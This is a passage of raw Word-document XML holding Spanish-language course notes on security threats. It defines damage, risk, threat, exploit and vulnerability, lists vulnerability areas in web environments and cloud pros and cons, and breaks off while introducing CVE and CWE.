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2BD5" w14:textId="77777777" w:rsidR="00BB115D" w:rsidRDefault="00BB115D" w:rsidP="000340F3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>UNIDAD 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FF7E3F" w14:textId="0220FA70" w:rsidR="000340F3" w:rsidRDefault="00924758" w:rsidP="000340F3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>AMENAZAS A LA SEGURIDAD</w:t>
      </w:r>
      <w:r w:rsidR="00530B5A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEC4D98" w14:textId="7C9C0D68" w:rsidR="00BB115D" w:rsidRPr="00986EC5" w:rsidRDefault="00BB115D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00986EC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Conceptos Básicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC3F99A" w14:textId="77777777" w:rsidR="00BB115D" w:rsidRPr="00BB115D" w:rsidRDefault="00530B5A" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Daño</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: el pe</w:t>
      </w:r>
      <w:r w:rsidR="00BB115D" w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>juicio que se produce cuando un sistema informático falla. El p</w:t>
      </w:r>
      <w:r w:rsidR="00BB115D" w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>er</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>juicio debe ser cuantificable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCA963F" w14:textId="77777777" w:rsidR="00BB115D" w:rsidRPr="00BB115D" w:rsidRDefault="00530B5A" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Riesgo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Como el producto entre la magnitud de daño y la probabilidad de que este tenga lugar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444B1623" w14:textId="77777777" w:rsidR="00BB115D" w:rsidRPr="00BB115D" w:rsidRDefault="00530B5A" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Amenaza:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Situación de daño cuyo riesgo de producirse es significativo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E2A9D8" w14:textId="77777777" w:rsidR="00BB115D" w:rsidRPr="00BB115D" w:rsidRDefault="00530B5A" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Exploit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> cualquier técnica que permita aprovechar una vulnerabilidad de un sistema para producir un daño en el mismo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D5B88" w14:textId="174944D7" w:rsidR="000340F3" w:rsidRPr="00BB115D" w:rsidRDefault="00530B5A" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Vulnerabilidad:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> deficiencia en un sistema susceptible de producir un fallo en el mismo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEC5735" w14:textId="77777777" w:rsidR="00BB115D" w:rsidRPr="00BB115D" w:rsidRDefault="00BB115D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682BC381" w14:textId="77777777" w:rsidR="00BB115D" w:rsidRPr="00BB115D" w:rsidRDefault="00530B5A" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tipos de vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6A6CBF" w14:textId="77777777" w:rsidR="00BB115D" w:rsidRPr="00BB115D" w:rsidRDefault="00530B5A" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Implementación</w:t>
      </w:r>
      <w:r w:rsidR="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CC15B1" w14:textId="77777777" w:rsidR="00BB115D" w:rsidRPr="00BB115D" w:rsidRDefault="00530B5A" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Diseño</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AA5FE9" w14:textId="288F9DB4" w:rsidR="000340F3" w:rsidRPr="00BB115D" w:rsidRDefault="000340F3" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Diseño</w:t>
      </w:r>
      <w:r w:rsidR="00530B5A" w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y uso</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C0CFA2" w14:textId="77777777" w:rsidR="00BB115D" w:rsidRPr="00BB115D" w:rsidRDefault="00530B5A" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Áreas de vulnerabilidades en entornos Web </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E58039D" w14:textId="77777777" w:rsidR="00BB115D" w:rsidRDefault="000340F3" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Área de </w:t>
      </w:r>
      <w:r w:rsidR="00530B5A" w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cliente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66907F70" w14:textId="77777777" w:rsidR="00BB115D" w:rsidRDefault="000340F3" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Área de </w:t>
      </w:r>
      <w:r w:rsidR="00530B5A" w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Re</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">d </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5247D989" w14:textId="195ED7FB" w:rsidR="000340F3" w:rsidRDefault="000340F3" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Área de </w:t>
      </w:r>
      <w:r w:rsidR="00530B5A" w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Servidor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A9BD0F" w14:textId="77777777" w:rsidR="00BB115D" w:rsidRPr="00BB115D" w:rsidRDefault="00BB115D" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1363"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E1BFEE" w14:textId="77777777" w:rsidR="00BB115D" w:rsidRDefault="00530B5A" w:rsidP="000340F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">La </w:t>
      </w:r>
      <w:r w:rsidR="000340F3" w:rsidRPr="00BB115D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ube</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08069827" w14:textId="08B2E22A" w:rsidR="00BB115D" w:rsidRDefault="00530B5A" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Ventajas </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F6469E" w14:textId="77777777" w:rsidR="00BB115D" w:rsidRDefault="00530B5A" w:rsidP="00BB115D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Facilidad de acceso a la información desde cualquier dispositivo y lugar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08437A89" w14:textId="77777777" w:rsidR="00F6015B" w:rsidRDefault="000340F3" w:rsidP="00F6015B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB115D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Infraestructura flexible y escalable basada en servicios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42522971" w14:textId="77777777" w:rsidR="00F6015B" w:rsidRDefault="000340F3" w:rsidP="00F6015B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Reducción de costos por infraestructura y servicio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A9E310" w14:textId="6AB52CA1" w:rsidR="00F6015B" w:rsidRPr="00F6015B" w:rsidRDefault="000340F3" w:rsidP="00F6015B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Centralización de administración y gestión de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488746C5" w14:textId="77777777" w:rsidR="00F6015B" w:rsidRDefault="00E26404" w:rsidP="00F6015B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Desventajas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AADFD10" w14:textId="77777777" w:rsidR="00F6015B" w:rsidRDefault="000340F3" w:rsidP="00F6015B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Dependencia en la infraestructura y servicio de terceros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC9DE58" w14:textId="77777777" w:rsidR="00F6015B" w:rsidRDefault="000340F3" w:rsidP="00F6015B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Dependencia en servicios de comunicación externos para acceder al sistema y datos propios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A339B8" w14:textId="686A8DAC" w:rsidR="000340F3" w:rsidRPr="00F6015B" w:rsidRDefault="000340F3" w:rsidP="00F6015B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>No tener control de la seguridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1FA34D" w14:textId="77777777" w:rsidR="000340F3" w:rsidRPr="000340F3" w:rsidRDefault="000340F3" w:rsidP="000340F3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65BF24C8" w14:textId="013A49D3" w:rsidR="00E26404" w:rsidRPr="000340F3" w:rsidRDefault="00E26404">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000340F3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F309DC" w14:textId="3EAEC9A0" w:rsidR="00E26404" w:rsidRPr="000340F3" w:rsidRDefault="00E26404">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000340F3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF698D3" w14:textId="0135D87F" w:rsidR="00E26404" w:rsidRDefault="00E26404">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000340F3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60057729" w14:textId="77777777" w:rsidR="002D4430" w:rsidRPr="00F6015B" w:rsidRDefault="00E26404" w:rsidP="002D4430">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Ataque a </w:t>
      </w:r>
      <w:r w:rsidR="002D4430" w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">plicaciones </w:t>
      </w:r>
      <w:r w:rsidR="002D4430" w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6015B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>onocidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12483500" w14:textId="69EBD174" w:rsidR="002D4430" w:rsidRPr="002D4430" w:rsidRDefault="002D4430" w:rsidP="002D4430">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CVE (</w:t>
      </w:r>
      <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Common Vulnerabilities and Exposures</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un código asignado que permite identificar a una </w:t>
      </w:r>
      <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerabilidad </w:t>
      </w:r>
      <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de forma univoca. </w:t>
      </w:r>
      <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>Este código fue creado por MITRE Corporation y permite conocer de manera más objetiva las vulnerabilidades.</w:t>
      </w:r>
      <w:r w:rsidR="00F6015B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F6015B" w:rsidRPr="00F6015B">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Forma de implementación:</w:t>
      </w:r>
      <w:r w:rsidR="00F6015B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE – año - numero. </w:t>
      </w:r>
      <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>http://cve.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06827999" w14:textId="77777777" w:rsidR="002D4430" w:rsidRPr="002D4430" w:rsidRDefault="002D4430" w:rsidP="002D4430">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="788EC6A5" w14:textId="77777777" w:rsidR="002D4430" w:rsidRPr="002D4430" w:rsidRDefault="002D4430" w:rsidP="002D4430">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CWE</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Common Weakness Enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4430">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidR="00E26404" w:rsidRPr="002D4430">
